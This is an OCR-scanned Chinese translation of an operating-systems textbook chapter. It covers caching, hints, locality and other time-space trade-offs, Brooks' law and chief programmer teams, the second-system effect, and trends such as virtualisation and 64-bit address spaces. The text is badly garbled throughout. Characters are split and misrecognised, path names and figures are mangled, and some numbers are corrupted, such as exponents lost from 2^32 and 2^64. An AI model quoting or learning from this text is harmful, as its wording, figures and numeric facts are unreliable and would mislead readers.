在 表 中 查找 答案 可 以 用 在 其 他 方面 。 例 如 ， 在 第 7 章 中 ， 我 们 看 到 
了 JPEG 图 像 压缩 是 怎样 工作 的 ， 它 使 用 了 相当 复杂 的 离散 余弦 变换 。 
另 一 种 压缩 技术 GIF 使 用 表 奉 找 来 编码 24 位 RGB 图 像 。 然 而 ，GIF 只 对 
具有 256 种 颜色 或 更 少 颜 色 的 图 像 起 作用 。 对 于 每 幅 要 压缩 的 图 像 ， 构 
造 一 个 256 项 的 调 色 板 ， 每 一 项 包含 一 个 24 位 的 RGB 值 。 压 缩 过 的 图 像 














于 是 包含 每 个 像素 的 8 位 索引 ， 而 不 是 24 位 颜色 值 ， 增 益 因 子 为 3。 图 

13-8 中 针对 一 幅 图 像 的 一 个 4x4 区 域 说 明了 这 一 思想 。 原 始 未 压缩 的 图 
像 如 图 13-8a 所 示 ， 该 图 中 每 个 取 值 是 一 个 24 位 的 值 ， 每 8 位 给 出 红 、 绿 
和 蓝 的 强度 。GIF 图 像 如 图 13-8b 所 示 ， 该 图 中 每 个 取 值 是 一 个 进入 调 色 
板 的 8 位 索引 。 调 色 板 作为 图 像 文 件 的 一 部 分 存放 ， 如 图 13-8c 所 示 。 实 
际 上 ，GIF 算 法 的 内 容 比 这 要 多 ， 但 是 思想 的 核心 是 表 查 找 。 
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图 13-8 人 每 个 像素 24 位 的 未 压缩 图 像 的 局 部 ; b) 以 GIF 压缩 的 相同 局 
部 ， 每 个 像素 8 位 ; SEM 


存在 减少 图 像 大 小 的 另 一 种 方法 ， 并 且 这 种 方法 说 明了 一 种 不 同 的 
权衡 。PostScript 是 一 种 程序 设计 语言 ， 可 以 用 来 描述 图 像 。 (实际 上 ， 
任何 程序 设计 语言 都 可 以 描述 图 像 ， 但 是 PostScript 专 为 这 一 目的 进行 了 
调节 。) 许多 打印 机 具有 内 嵌 的 PostScript 解 释 器 ， 能 够 运行 发 送 给 它们 


的 PostScript 程 序 。 


例如 ， 如 果 在 一 幅 图 像 中 存在 一 个 像素 矩形 块 具 有 相同 的 颜色 ， 用 
于 该 图 像 的 PostScript 程 序 将 携带 指令 ， 用 来 将 一 个 矩形 放置 在 一 定 的 位 
置 并 且 用 一 定 的 颜色 填充 该 算 形 。 只 需要 少数 几 个 位 就 可 以 发 出 此 命 
令 。 当 打印 机 接收 图 像 时 ， 打 印 机 中 的 解释 器 必须 运行 程序 才能 绘制 出 
图 像 。 因 此 ，PostScript 以 更 多 的 计算 为 代价 实现 了 数据 压缩 ， 这 是 与 表 
查找 不 同 的 一 种 权衡 ， 但 是 当 内 存 或 带宽 不 足 时 是 左 有 价值 的 。 





其 他 的 权衡 经 常 牵 涉 数据 结构 。 双 向 链表 比 单 向 链表 占据 更 多 的 内 
存 ， 但 是 经 和 常 使 得 访问 表 项 速度 更 快 。 散 列表 甚至 更 浪费 空间 ， 但 是 要 
更 快 。 简 而 言 之 ， 当 优化 一 段 代码 时 要 考虑 的 重要 事情 之 一 是 : 使 用 不 
同 的 数据 结构 是 否 将 产生 最 佳 的 时 间 - 空 间 平 衡 。 








13.4.4 “高速 缓存 





用 于 改进 性 能 的 一 种 众所周知 的 技术 是 高 速 缓存 。 在 任何 相同 的 结 
果 可 能 需要 多 次 的 情况 下 ， 高 速 缓存 都 是 适用 的 。 一 般 的 方法 是 首先 做 
完整 的 工作 ， 然 后 将 结果 保存 在 高 速 缓存 中 。 对 于 后 来 的 答 试 ， 首 先 要 
检查 高 速 缓 在 。 如 果 结 果 在 高 速 缓存 中 ， 就 使 用 它 。 否 则 ， 再 做 完整 的 
Life 

















我 们 已 经 看 到 高 速 缓存 在 文件 系统 内 部 的 运用 ， 在 高 速 缓存 中 保存 
一 定数 目 最 近 用 过 的 磁盘 块 ， 这 样 在 每 次 命中 时 就 可 以 省 略 磁 盘 读 操 
作 。 然 而 ， 高 速 缓存 还 可 以 用 于 许多 其 他 目的 。 例 如 ， 解 析 路 径 名 就 代 
价 高 昂 得 令 人 吃惊 。 再 次 考虑 图 4-35 中 UNIX 的 例子 。 为 了 碍 
找 /usrasVmbox， 需 要 如 下 的 磁盘 访问 : 








1) 读 入 根 目 录 的 i 节点 (i 节点 1) o 
2) 读 入 根 目录 《磁盘 块 1) 。 
3) 读 入 /sr 的 i 节点 (i 节点 6) 。 


4) 读 入 /musr 目 录 〔〈 磁 盘 块 132) 。 





5) 读 入 /asrast 的 i 节 点 〈i 节 点 26) 。 


6) 读 入 /usr/ast 目 录 〔 人 磁盘 块 406) 。 





只 是 为 了 获得 文件 的 i 节 点 号 就 需要 6 次 磁盘 访问 。 然 后 必须 读 入 ji 节 
点 本 身 以 获得 磁盘 块 号 。 如 果 文 件 小 于 块 的 大 小 〈 例 如 1024 字 节 ) ， 那 
需要 8 次 磁盘 访问 才 读 到 数据 。 





某 些 系统 通过 对 “〈 路 径 ，i 节 点 ) 的 组 合 进行 高 速 缓存 来 优化 路 径 
名 的 解析 。 对 于 图 4-35 的 例子 ， 在 解析 /usr/ast/mbox 之 后 ， 高 速 绥 存 中 
肯定 会 保存 图 13-9 的 前 三 项 。 最 后 三 项 来 自 解 析 其 他 路 径 。 



















aa | | 
srlasymbox | 60 


图 13-9 图 4-35 的 i 节点 高 速 缓存 的 局 部 














当 必 须 查 找 一 个 路 径 时 ， 名 字 解 析 器 首先 查阅 高 速 绥 存 并 搜索 它 以 
找到 高 速 缓存 中 存在 的 最 长 的 子 字符 串 。 例 如 ， 如 果 存 在 路 
径 /usr/ast/grants/stw， 高 速 缓存 会 返回 /usr/ast/ 是 i 节点 26 这 样 的 事实 ， 这 
样 搜索 就 可 以 从 这 里 开始 ， 消 除了 四 次 磁盘 访问 。 














对 路 径 进行 高 速 缓存 存在 的 一 个 问题 是 ， 文 件 名 与 i 节 点 号 之 间 的 
映射 并 不 总 是 固定 的 。 假 设 文件 /usr/ast/mbox 从 系统 中 被 删除 ， 并 且 其 i 
节点 重用 于 不 同 用 户 所 拥有 的 不 同 的 文件 。 随 后 ， 文 件 /asrvasVmbox 再 
次 被 创建 ， 并 且 这 一 次 它 得 到 i 节 点 106。 如 果 不 对 这 件 事情 进行 预防 ， 
高 速 缓存 项 现在 将 是 错误 的 ， 并 且 后 来 的 碍 找 将 返回 错误 的 i 贡 点 号 。 
为 此 ， 当 一 个 文件 或 目录 被 删除 时 ， 它 的 高 速 缓存 项 以 及 《如果 它 是 一 
个 目录 的 话 ) 它 下面 所 有 的 项 都 必须 从 高 速 缓存 中 清除 。 











人 磁盘 块 与 路 径 名 并 不 是 能 够 高 速 缓存 的 惟一 项 目 ，i 节 点 也 可 以 被 
高 速 缓存 。 如 果 弹 出 的 线程 用 来 处 理 中 断 ， 每 个 这 样 的 线程 需要 一 个 栈 
和 某 些 附加 的 机 构 。 这 些 以 前 用 过 的 线程 也 可 以 被 高 速 缓存， 因为 刷新 
一 个 用 过 的 线程 比 从 类 创建 一 个 新 的 线程 更 加 容易 (为 了 避免 必须 分 配 
ATE) 。 难 于 生产 的 任何 事物 几乎 都 能 够 被 高 速 缓存 。 





13.4.5 BB 





高 速 缓存 项 总 是 正确 的 。 高 速 缓存 搜索 可 能 失败 ， 但 是 如 果 找 到 了 
一 项 ， 那 么 这 一 项 保证 是 正确 的 并 且 无 需 再 费 周 折 就 可 以 使 用 。 在 东 些 
系统 中 ， 包 含 线索 Chint) 的 表 是 十 分 便利 的 。 这 些 线索 是 关于 答案 的 
音 示 ， 但 是 它们 并 不 保证 是 正确 的 。 调 用 者 必须 自行 对 结果 进行 验证 。 





众所周知 的 天 于 线索 的 例子 是 藤 在 Web 页 上 的 URL。 点 击 一 个 链接 
并 不 能 保证 被 指 癌 的 web 页 束 在 那里 。 事 实 上 ， 被 指 同 的 网 页 可 能 10 年 
前 就 被 删除 了 。 因 此 包含 URL 的 网 页 上 面 的 信息 只 是 一 个 线索 。 











线索 还 用 于 连接 远程 文件 。 信 息 是 提示 有 关 远 程 文件 某 些 事项 的 线 
索 ， 例 如 文件 存放 的 位 置 。 然 而 ， 目 该 线索 被 记录 以 来 ， 文 件 可 能 已 经 
被 移动 或 者 被 删除 了 ， 所 以 为 了 明确 线索 是 否 正确 ， 总 是 需要 进行 检 
# 


13.4.6 ”利用 局 部 性 





进程 和 程序 的 行为 并 不 是 随机 的 ， 它 们 在 时 间 上 和 空间 上 展现 出 相 
当 程 度 的 局 部 性 ， 并 且 可 以 以 各 种 方式 利用 该 信息 来 改进 性 能 。 空 间 局 
部 性 的 一 个 常见 例子 是 这 样 的 事实 : 进程 并 不 是 在 其 地 址 空间 内 部 随机 
地 到 处 跳 转 的 。 在 一 个 给 定 的 时 间 间 隔 内 ， 它 们 倾向 于 使 用 数目 比较 少 
的 页 面 。 进 程 正 在 有 效 地 使 用 的 页 面 可 以 被 标记 为 它 的 工作 集 ， 并 且 操 
作 系 统 能 够 确保 当 进 程 被 允许 运行 时 ， 它 的 工作 集 在 内 存 中 ， 这 样 就 减 
少 了 缺 页 的 次 数 。 





局 部 化 原理 对 于 文件 也 是 成 立 的 。 当 一 个 进程 选择 了 一 个 特定 的 工 
作 目 录 时 ， 很 可 能 将 来 许多 文件 引用 将 指向 该 目录 中 的 文件 。 通 过 在 磁 
盘 上 将 每 个 目录 的 所 有 i 节 点 和 文件 就 近 放 在 一 起 ， 可 能 会 获得 性 能 的 
改善 。 这 一 原理 正 是 Berkeley 快 速 文件 系统 的 基础 〈MCcKusick 等 人 ， 
1984) 。 





局 部 性 起 作用 的 另 一 个 领域 是 多 处 理 器 系统 中 的 线程 调度 。 正 如 我 
们 在 第 8 章 中 看 到 的 ， 在 多 处 理 器 上 一 种 调度 线程 的 方法 是 试图 在 最 后 
一 次 用 过 的 CPU 上 运行 每 个 线程 ， 期 望 它 的 某 些 内 存 块 依然 还 在 内 存 的 
高 速 缓存 中 。 


13.4.7 ”优化 背 见 的 情况 


区 分 最 第 见 的 情况 和 最 坏 可 能 的 情况 并 且 分 别处 理 它们 ， 这 通常 是 
一 个 好 主意 。 针 对 这 两 者 的 代码 常常 是 相当 不 同 的 。 重 要 的 是 要 使 第 见 
的 情况 速度 快 。 对 于 最 坏 的 情况 ， 如 果 它 很 少 友 生 ， 使 其 正确 束 足 够 


第 一 个 例子 ， 考 虑 进入 一 个 临界 区 。 在 大 多 数 时 间 中 ， 进 入 将 是 成 
功 的 ， 特 别 是 如 果 进 程 在 临界 区 内 部 不 花费 很 多 时 间 的 话 。Windows 
Vista 提 供 的 一 个 win32 API 调 用 EnterCriticalSection 就 利用 了 这 一 期 望 ， 
它 自动 地 在 用 户 态 测试 一 个 标志 (使 用 TSL 或 等 价 物 ) 。 如 果 测 试 成 
功 ， 进 程 只 是 进入 临界 区 并 且 不 需要 内 核 调用 。 如 果 测试 失败 ， 库 过 程 
将 调用 一 个 信号 量 上 的 down 操 作 以 阻塞 进程 。 因此， 在 通常 情况 下 是 
不 需要 内 核 调 用 的 。 








第 二 个 例子 ， 考 虑 设置 一 个 警报 〈 在 UNIX 中 使 用 信号 ) 。 如 果 当 
前 没有 警报 竺 完成， 那么 构造 一 个 警报 并 且 将 其 放 在 定时 器 队列 上 是 很 
简单 的 。 然 而 ， 如 果 已 经 有 一 个 警报 待 完 成 ， 那 么 就 必须 找到 它 并 且 从 
定时 器 队列 中 删除 。 由 于 alarm 调 用 并 未 指明 是 否 已 经 设置 了 一 个 警 
报 ， 所 以 系统 必须 假设 最 坏 的 情况 ， 即 有 一 个 警报 。 然 而 ， 由 于 大 多 数 
时 间 不 存在 警报 待 完 成， 并 且 由 于 删除 一 个 现 有 的 警报 代价 高 量 ， 所 以 





区 分 这 两 种 情况 是 一 个 好 主意 。 


做 这 件 事情 的 一 种 方法 是 在 进程 表 中 保留 一 个 位 ， 表 明 是 否 有 一 个 
警报 待 完成。 如果 这 一 位 为 0， 就 好 办 了 《只 是 添加 一 个 新 的 定时 器 队 
列 项 而 无 须 检 查 ) 。 如 果 该 位 为 1， 则 必须 检查 定时 惕 队列 。 





13.5 项 目 管理 


程序 员 是 天 生 的 乐观 主义 者 。 他 们 中 的 大 多 数 认为 编写 程序 的 方式 
就 是 急切 地 奔 癌 键盘 并 且 开 始 击 键 ， 不 久 以 后 完全 调试 好 的 程序 就 完成 
了 。 对 于 非常 大 型 的 程序 ， 事 实 并 非 如 此 。 在 下 面 几 节 ， 关 于 管理 大 型 
软件 项 目 ， 特 别 是 大 型 操作 系统 项 目 ， 我 们 有 一 些 看 法 要 陈述 。 


13.5.1 人 月 神话 


经 典 著作 《人 月 神话 》 的 作者 Fred Brooks 是 OS/360 的 设计 者 之 一 ， 
他 后 来 转 同 了 学 术 界 。 在 这 部 经 典 著作 中 ，Fred Brooks 讨 论 了 建造 大 型 
操作 系统 为 什么 如 此 艰难 的 问题 (Brooks,1975,1995) 。 当 大 多 数 程序 
员 看 到 他 声称 程序 员 在 大 型 项 目 中 每 年 只 能 产 出 1000 行 调试 好 的 代码 
时 ， 他 们 怀疑 Brooks 教 授 是 否 生活 在 外 层 空间 ， 或 许 是 在 臭虫 星 
此 处 Bug 为 双关 语 ) 上 。 毕 竟 ， 他 们 中 的 大 多 数 在 熬夜 
的 时 候 一 个 晚上 就 可 以 产 出 1000 行 程序 。 这 怎么 可 能 是 任何 一 个 IQ 大 于 
50 的 人 一 年 的 产 出 呢 ? 











(Planet Bug 




















Brooks 指 出 的 是 ， 具 有 几 百 名 程序 员 的 大 型 项 目 完 全 不 同 于 小 型 项 
目 ， 并 且 从 小 型 项 目 获得 的 结果 并 不 能 放大 到 大 型 项 目 。 在 一 个 大 型 项 
目 中 ， 甚 至 在 编码 开始 之 前 ， 大 量 的 时 间 就 消耗 在 规划 如 何 将 工作 划分 








成 模块 、 仔 细 地 说 明 模 块 及 其 接口 ， 以 及 试图 设想 模块 将 怎样 互相 作用 
这 样 的 事情 上 。 然 后 ， 模 块 必须 独立 地 编码 和 调试 。 最 后 ， 模 块 必须 集 
成 起 来 并 且 必 须 将 系统 作为 一 个 整体 来 测试 。 通 常 的 情况 是 ， 每 个 模块 
单独 测试 时 工作 得 十 分 完美 ， 但 是 当 所 有 部 分 集成 在 一 起 时 ， 系 统 立 刻 
jist. Brooks} C/E (htt F: 








.1/3 规 划 


.1/6 编 码 


1/4 模 块 测试 


.1/4 系统 测试 








换言之 ， 编 写 代码 是 容易 的 部 分 ， 困 难 的 部 分 是 断定 应 该 有 哪些 模 
块 并 且 使 模块 A 与 模块 B 正 确 地 交互 。 在 由 一 名 程序 员 编 写 的 小 型 程序 
中 ， 留 竺 处 理 的 所 有 部 分 都 是 简单 的 部 分 。 


Brooks 的 书 的 标题 来 自 他 的 断言 ， 即 人 与 时 间 是 不 可 互 换 的 。 不 存 
在 “人 月 "这样 的 单位 。 如 果 一 个 项 目 需要 15 个 人 花 2 年 时 间 构 建 ， 很 难 
想像 360 个 人 能 够 在 1 个 月 内 构建 它 ， 甚 至 让 60 个 人 在 6 个 月 内 做 出 它 或 
许 也 是 不 可 能 的 。 


产生 这 一 效应 有 三 个 原因 。 第 一 ， 工 作 不 可 能 完全 并 行 化 。 直 到 完 
成 规划 并 且 确 定 了 需要 哪些 模块 以 及 它们 的 接口 ， 甚 至 都 不 能 开始 编 





码 。 对 于 一 个 2 年 的 项 目 ， 仪 仅 规 划 可 能 就 要 花费 8 个 月 。 





第 二 ， 为 了 完全 利用 数目 众多 的 程序 员 ， 工 作 必 须 划分 成 数目 众多 
的 模块 ， 这 样 每 个 人 才能 有 事情 做 。 由 于 每 个 模块 可 能 潜在 地 与 每 个 其 
他 模块 相互 作用 ， 需 要 将 模块 -模块 相互 作用 的 数目 看 成 随 着 模块 数目 
的 平方 而 增长 ， 也 惑 是 说 ， 随 着 程序 员 数 目的 平方 而 增长 。 这 一 复杂 性 
很 快 就 会 失去 控制 。 对 于 大 型 项 目 而 言 ， 人 与 月 之 间 的 权衡 远 不 是 线性 
的 ， 对 63 个 软件 项 目 精细 的 测量 证 实 了 这 一 点 (Boehm,1981) 。 














第 三 ， 调 试 工作 是 高 度 序列 化 的 。 对 于 一 个 问题 ， 安 排 10 名 调试 人 
员 并 不 会 加 快 10 们 发 现 程 序 错 误 。 事 实 上 ，10 名 调试 人 员 或 许 比 一 名 调 
试 人 员 还 要 慢 ， 因 为 他 们 在 相互 沟通 上 要 浪费 太 多 的 时 间 。 





对 于 人 员 与 时 间 的 权衡 ，Brooks 将 他 的 经 验 总 结 在 Brooks 定 律 中 : 


对 于 一 个 延期 的 软件 项 目 ， 增 加 人 力 将 使 它 更 加 延期 。 





增加 人 员 的 问题 在 于 他 们 必须 在 项 目 中 获得 培训 ， 模 块 必须 重新 划 
分 以 便 与 现在 可 用 的 更 多 数目 的 程序 员 相 匹配 ， 需 要 开 许多 会 议 来 协调 
各 方面 的 努力 等 。Abdel-Hamid 和 Madnick (1991) 用 实验 方法 证 实 了 这 
一 定律 。 用 稍稍 不 敬 的 方法 重 述 Brooks 定 律 就 是 : 











无 论 分 配 多 少妇 女 从 事 这 一 工作 ， 生 一 个 孩子 都 需要 9 个 月 。 


13.5.2 ”团队 结构 


商业 操作 系统 是 大 型 的 软件 项 目 ， 总 是 需要 大 型 的 人 员 团 队 。 人 员 
的 质量 极为 重要 。 几 十 年 来 人 们 已 经 众所周知 的 是 ， 顶 尖 的 程序 员 比 拙 
劣 的 程序 员 生 产 率 要 高 出 10 倍 〈Sackman 等 人 ，1968) 。 麻 烦 在 于 ， 当 
你 需要 200 名 程序 员 时 ， 找 到 200 名 顶尖 的 程序 员 非 常 困难 ， 对 于 程序 员 
的 质量 你 不 得 不 有 所 将 就 。 








在 任何 大 型 的 设计 项 目 《〈 软 件 或 其 他 ) 中 ， 同 样 重要 的 是 需要 体系 
结构 的 一 致 性 。 应 该 有 一 名 才 重 超群 的 人 对 设计 进行 控制 。Brooks 引 证 
兰 斯 大 教堂 中 作为 大 型 项 目的 例子 ， 兰 斯 大 教堂 的 建造 花费 了 几 十 年 
的 时 间 ， 在 这 一 过 程 中 ， 后 来 的 建筑 师 完全 服从 于 完成 最 初 风格 的 建筑 
师 的 规划 。 结 果 是 其 他 欧洲 大 教 芝 无 可 比拟 的 建筑 结构 的 一 致 性 。 








在 20 世 纪 70 年 代 ，Harlan Mills 把 “一 些 程序 员 比 其 他 程序 员 要 好 很 
多 ”的 观察 结果 与 对 体系 结构 一 致 性 的 需要 相 结合 ， 提 出 了 首席 程序 员 
团队 (chief programmer team) 的 范式 (Baker,1972) 。 他 的 思想 是 要 像 
一 个 外 科 手 术 团 队 ， 而 不 是 像 一 个 杀 猪 屠夫 团队 那样 组 织 一 个 程序 员 团 
队 。 不 是 每 个 人 像 疯子 一 样 乱 砍 一 气 ， 而 是 由 一 个 人 掌握 着 手术 思 ， 其 
他 人 在 那里 提供 支持 。 对 于 一 个 10 名 人 员 的 项 目 ，Mills 建 议 的 团队 结构 
如 图 13-10 所 示 。 








内 
执行 体系 结构 设计 并 编写 代码 | 
辅助 首席 程序 员 并 为 其 提供 咨询 

管理 人 员 、 预 算 、 空 间 、 设 备 、 报 告 等 

编辑 文档 ， 而 文档 必须 由 首席 程序 员 编 写 

行政 主管 和 编辑 各 需要 一 名 秘书 

维护 代码 和 文档 档案 

提供 首席 程序 员 需 要 的 任何 工具 

测试 首席 程序 员 的 代码 

兼职 人 员 ， 他 可 以 就 语言 向 首席 程序 员 提 供 建议 
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图 13-10 Mills 建 议 的 10 人 首席 程序 员 团 队 的 分 工 


自从 提出 这 一 建议 并 付 诸 实施 ，30 年 过 去 了 。 一 些 事情 已 经 变化 
(例如 需要 一 个 语言 层 一 一 C 比 PL/I 更 为 简单 ) ， 但 是 只 需要 一 名 才智 
超群 的 人 员 对 设计 进行 控制 仍然 是 正确 的 。 并 且 这 名 才智 超群 者 在 设计 
和 编程 上 应 该 能 够 100% 地 起 作用 ， 因 此 需要 支持 人 员 。 尺 管 借 助 于 计 
算 机 的 帮助 ， 现 在 一 个 更 小 的 支持 人 员 队 伍 就 足够 了 。 但 是 在 本 质 上 ， 
这 一 思想 仍然 是 有 效 的 。 





任何 大 型 项 目 都 需要 组 织 成 层次 结构 。 克 层 是 许多 小 的 团队 ， 每 个 
团队 由 首席 程序 员 领 导 。 在 下 一 层 ， 必 须 由 一 名 经 理 人 对 一 组 团队 进行 
协调 。 经 验 表 明 ， 你 所 管理 的 每 一 个 人 将 花费 你 10% 的 时 间 ， 所 以 每 10 
个 团队 的 一 个 小 组 就 需要 一 名 全 职 的 经 理 人 。 这 些 经 理 人 也 必须 被 管 
Pils 
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[Jerry Saltzer 将 这 一 效应 称 为 坏 消 轧 二 极 管 (bad-news diode) 。 因 为 
存在 着 在 两 千年 前 将 带 来 坏 信息 的 信使 斩首 的 古老 传统 ， 所 以 首席 程序 
员 或 经 理 人 都 不 愿意 告诉 他 的 老板 项 目 延 期 了 4 个 月 ， 并 且 无 论 如 何 都 
没有 满足 最 终 时 限 的 机 会 。 因 此 ， 项 层 管理 者 就 项 目的 状态 通常 不 明 就 
里 。 当 不 能 满足 最 终 时 限 的 情况 变 得 十 分 明显 时 ， 项 层 管理 者 的 响应 是 
增加 人 员 ， 此 时 Brooks 定 律 就 起 作用 了 。 








实际 上 ， 大 型 公司 拥有 生产 软件 的 丰富 经 验 并 且 知 道 如 果 它 随意 地 
生产 会 发 生 人 什么， 这样 的 公司 趋同 于 至 少 是 试图 正确 地 做 事情 。 相 反 ， 
较 小 的 、 较 新 的 公司 ， 匆 匆忙 从 地 和 硕 望 其 产品 早日 上 市 ， 不 能 总 是 仔细 
地 生产 他 们 的 软件 。 这 经 常 导 致远 远 不 是 最 优化 的 结果 。 








Brooks 和 Mills 都 没有 预见 到 开放 源码 运动 的 成 长 。 尽 管 该 运动 取得 
了 某 些 成 功 ， 但 是 一 旦 新 鲜 感 消失 ， 它 是 否 还 是 生产 大 量 高 质量 软件 的 
切实 可 行 的 模型 还 有 竺 观察。 回想 早年 无 线 电 广播 是 由 业余 无 线 电 操作 
人 员 占 据 支 配 地 位 的 ， 但 是 很 快 就 让 位 于 商业 无 线 电台 和 后 来 的 商业 电 
视 台 。 值 得 注意 的 是 ， 最 为 成 功 的 开放 源码 软件 项 目 显然 使 用 了 首席 程 
序 员 模型 ， 有 一 名 才智 超群 者 控制 着 体系 结构 设计 《〈 例 如，Linus 
Torvalds 控 制 着 Linux 内 核 ， 而 Richard Stallman 控 制 着 GNU C 编 译 器 ) 。 




















NN 











[1] 兰 斯 (Reims) 法 国 东 北部 城市 。 译 者 注 


13.5.3 ”经验 的 作用 


拥有 丰富 经 验 的 设计 人 员 对 于 一 个 操作 系统 项 目 来 说 至 关 重 要 。 
Brooks 指 出 ， 大 多 数 错 误 不 是 在 代码 中 ， 而 是 在 设计 中 。 程 序 员 正确 地 
做 了 吟 只 他 们 要 做 的 事情 ， 而 吟 只 他 们 要 做 的 事情 是 错误 的 。 再 多 测试 
软件 部 无 法 弥补 糟 料 的 设计 说 明 书 。 








Brooks 的 解决 方案 是 放弃 图 13-11a 的 经 典 开发 模型 而 采用 图 13-11b 
的 模型 。 此 处 的 想法 是 首先 编写 一 个 主 程序 ， 它 仅仅 调用 顶层 过 程 ， 而 
顶层 过 程 最 初 是 哑 过 程 。 从 项 目的 第 一 天 开始 ， 系 统 就 可 以 编译 和 运 
行 ， 尽 管 它 什么 都 做 不 了 。 随 着 时 间 的 流逝 ， 模 块 被 插入 到 完全 的 系统 
中 。 这 一 方法 的 成 效 是 系统 集成 测试 能 够 持续 地 执行 ， 这 样 设 计 中 的 错 
误 就 可 以 更 早 地 显露 出 来 。 实 际 上 ， 拙 劣 的 设计 决策 导致 的 学 习 过 程 在 
软件 生命 周期 中 应 该 更 早 就 开始 。 








编码 





系统 


测试 





a) b) 


图 13-11 aA PRL LAE, b) 另 一 种 设计 在 第 一 天 开始 
就 产生 一 个 (什么 都 不 做 的 ) 工作 系统 


缺乏 知识 是 一 件 危 险 的 事情 。Brooks 注 意 到 被 他 称 为 第 二 系统 效应 
(second system effect) 的 现象 。 一 个 设计 团队 生产 的 第 一 件 产品 经 常 
是 最 小 化 的 ， 因 为 设计 人 员 担 心 它 可 能 根本 就 不 能 工作 。 结 果 ， 他 们 在 
加 入 许多 功能 特性 方面 是 迟疑 的 。 如 果 项 目 取得 成 功 ， 他 们 会 构建 后 续 
的 系统 。 由 于 被 他 们 自己 的 成 功 所 感动 ， 设 计 人 员 在 第 二 次 会 包含 所 有 
华而不实 的 东西 ， 而 这 些 是 他 们 在 第 一 次 有 意 省 去 的 。 结 果 ， 第 二 个 系 
统 腔 肿 不 堪 并 且 性 能 低 务 。 第 二 个 系统 的 失败 使 他 们 在 第 三 次 冷静 下 来 
并 且 再 次 小 心间 慎 。 











就 这 一 点 而 言 ，CTSS 和 MULTICS 这 一 对 系统 是 一 个 明显 的 例子 。 
CTSS 是 第 一 个 通用 分 时 系统 并 且 取 得 了 巨大 的 成 功 ， 尽 管 它 只 有 最 小 
化 的 功能 。 它 的 后 继 者 MULTICS 过 于 野心 勃勃 并 因此 而 吃 尽 了 苦头 。 














MULTICS 的 想法 是 很 好 的 ， 但 是 由 于 存在 太 多 新 的 东西 所 以 多 年 以 来 
系统 的 性 能 十 分 低劣 并 且 绝 对 不 是 一 个 重大 的 商业 成 功 。 在 这 一 开发 路 
线 中 的 第 三 个 系统 UNIX 则 更 加 小 心 谨慎 并 且 更 加 成 功 。 


13.5.4 没有 银 弹 


除了 《人 月 神话 》，Brooks 还 写 了 一 篇 有 影响 的 学 术 论 文 ， 称 
为 “No Silver Bullet” (没有 银 弹 ) (Brooks,1987) 。 在 这 篇 文章 中 ， 他 
主张 在 十 年 之 内 由 各 色 人 等 兜售 的 灵丹妙药 中 ， 没 有 一 样 能 够 在 软件 生 
产 率 上 产生 数量 级 的 改进 。 经 验 表明 他 是 正确 的 。 





在 建议 的 银 弹 中 ， 包 括 更 好 的 高 级 语言 、 面 问 对 象 的 程序 设计 、 人 
工 智能 、 专 家 系统 、 自 动 程序 设计 、 图 形 化 程序 设计 、 程 序 验证 以 及 程 
序 设 计 环 境 。 或 许 在 下 一 个 十 年 将 会 看 到 一 颗 银 弹 ， 或 许 我 们 将 只 好 满 
足 于 逐步 的 、 渐 进 的 改进 。 


13.6 ”操作 系统 设计 的 趋势 


做 预测 总 是 困难 的 一 一 特别 是 关于 未 来 。 例 如 ，1899 年 美国 专利 局 
局 长 Charles H.Duell 请 求 当时 的 总 统 McKinley( 麦 金利 ) 取消 专利 局 
(以 及 他 的 工作 ! ) ， 因 为 他 声称 “每 件 能 发 明 的 事物 都 已 经 发 明 
J” (Cerf and Navasky,1984) 。 然 而 ，Thomas Edison (HEH Hr. Zi 
Æ) 在 几 年 之 内 就 发 明了 几 件 新 的 物品 ， 包 括 电灯 、 留 声 机 和 电影 放映 
机 。 让 我 们 将 新 电池 装 入 我 们 的 水 晶 球 中 ， 并 且 冒 险 猜 测 一 下 在 最 近 的 
未 来 操作 系统 将 走向 何方 。 





13.6.1 虚拟 化 


虚拟 化 重 回 时 代 。 它 第 一 次 出 现在 1967 年 的 BM CP/CMS 系 统 中 ， 
现在 它 重 回 奔腾 平台 。 最 近 许 多 计算 机 在 裸 机 上 运行 管理 程序 ， 如 图 
13-12 所 示 。 管 理 程序 会 创建 多 个 虚拟 机 ， 每 个 虚拟 机 有 单独 的 操作 系 
统 。 有 些 计算 机 利用 一 个 虚拟 机 为 遗产 应 用 创建 Windows 系 统 ， 利 用 几 
个 虚拟 机 为 当前 应 用 运行 Linux 系 统 ， 或 许 也 会 在 其 他 虚拟 机 上 运行 若 
干 实验 性 操作 系统 。 这 种 现象 在 第 8 章 已 经 讨论 ， 并 且 是 未 来 的 发 展 趋 
势 。 




















虚拟 机 Windows| Linux 





图 13-12 运行 4 个 虚拟 机 的 管理 程序 


13.6.2 BRR A 





多 核心 片 已 经 出 现 ， 但 即使 是 双核 ， 针 对 它们 的 操作 系统 还 没有 很 
好 地 利用 其 能 力 ， 更 不 用 提 64 核 。 这 些 核 会 做 什么 事情 ? 它们 需要 哪些 
软件 ? 这 些 目前 都 是 未 知 的 。 起 初 ， 人 们 试图 通过 对 当前 操作 系统 打 补 
本 的 方法 来 文 持 多 核 ， 但 锁 表 问题 和 其 他 软件 资源 的 问题 使 得 这 种 方法 
不 太 可 能 成 功 ， 因 此 需要 全 新 的 思路 来 解决 这 些 问题 。 


虚拟 化 和 多 核 芯 片 的 结合 创造 了 一 个 全 新 的 环境 ， 这 里 CPU 的 数目 
是 可 编程 的 。 对 于 8 核 蕊 片 ， 软 件 可 以 在 下 列 情况 做 同样 的 事情 : 只 利 
用 1 个 CPU 而 忽略 其 他 7 个 ;使 用 全 部 8 个 CPU; 利用 双 道 虚拟 化 获得 16 
个 虚拟 CPU; 利用 四 道 虚拟 化 获得 32 个 虚拟 CPU; 或 更 多 其 他 组 合 。 程 
序 可 以 在 启动 时 指定 所 需 CPU 数 目 ， 由 操作 系统 来 保证 程序 需求 的 满 
足 。 





13.6.3 ”大 型 地 址 空间 操作 系统 


随 着 计算 机 从 32 位 地 址 空间 转向 64 位 地 址 空间 ， 操 作 系 统 设计 中 的 
重大 转变 成 为 可 能 。32 位 地 址 空间 并 不 大 。 如 果 你 通过 给 地 球 上 的 每 个 
人 提供 他 或 她 自己 的 字 节 来 试图 分 割 22 个 字 节 ， 那 么 将 没有 足够 的 字 
节 可 以 提供 。 相 反 ，264 大 约 是 2x1019 。 现 在 每 个 人 可 以 得 到 他 或 她 个 
人 的 3GB 大 的 一 块 。 


对 于 2x102 字 节 的 地 址 空间 我 们 能 做 什么 呢 ? 首先 ， 可 以 淘汰 文件 
